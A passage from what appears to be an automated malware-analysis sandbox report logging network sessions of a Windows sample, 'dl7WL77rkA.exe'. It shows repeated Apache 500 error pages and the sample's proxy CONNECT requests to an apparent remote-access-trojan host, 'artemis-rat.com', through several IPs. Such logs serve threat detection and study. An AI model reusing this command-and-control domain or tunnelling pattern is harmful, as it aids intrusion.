                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 69 6e 66 6f 40 6e 65 77 76 6f 69 63 65 2e 63 68 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:10.588279963 CET705INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 69 6e 66 6f 40 6e 65 77 76 6f 69 63 65 2e 63 68 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:11.540992975 CET705INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 69 6e 66 6f 40 6e 65 77 76 6f 69 63 65 2e 63 68 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:13.369271994 CET705INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 69 6e 66 6f 40 6e 65 77 76 6f 69 63 65 2e 63 68 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.025649071 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 69 6e 66 6f 40 6e 65 77 76 6f 69 63 65 2e 63 68 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this erro
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:20.681304932 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 69 6e 66 6f 40 6e 65 77 76 6f 69 63 65 2e 63 68 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this erro
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:24.337564945 CET705INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:09 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 529
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 69 6e 66 6f 40 6e 65 77 76 6f 69 63 65 2e 63 68 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@newvoice.ch to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1521192.168.2.554186200.111.182.64433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.827052116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1522192.168.2.554187200.111.182.64433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.830065012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1523192.168.2.553686168.126.74.132803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.854548931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:20.562784910 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:21.427655935 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:22.387366056 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:24.243488073 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:27.955363989 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:35.507469893 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:50.355456114 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1524192.168.2.554129172.67.25.204803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.855458021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.010020018 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1525192.168.2.550082104.238.111.107263053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.863953114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905006886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.989506006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.036731005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1526192.168.2.553802132.148.128.88293133876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.870871067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905198097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.998831034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
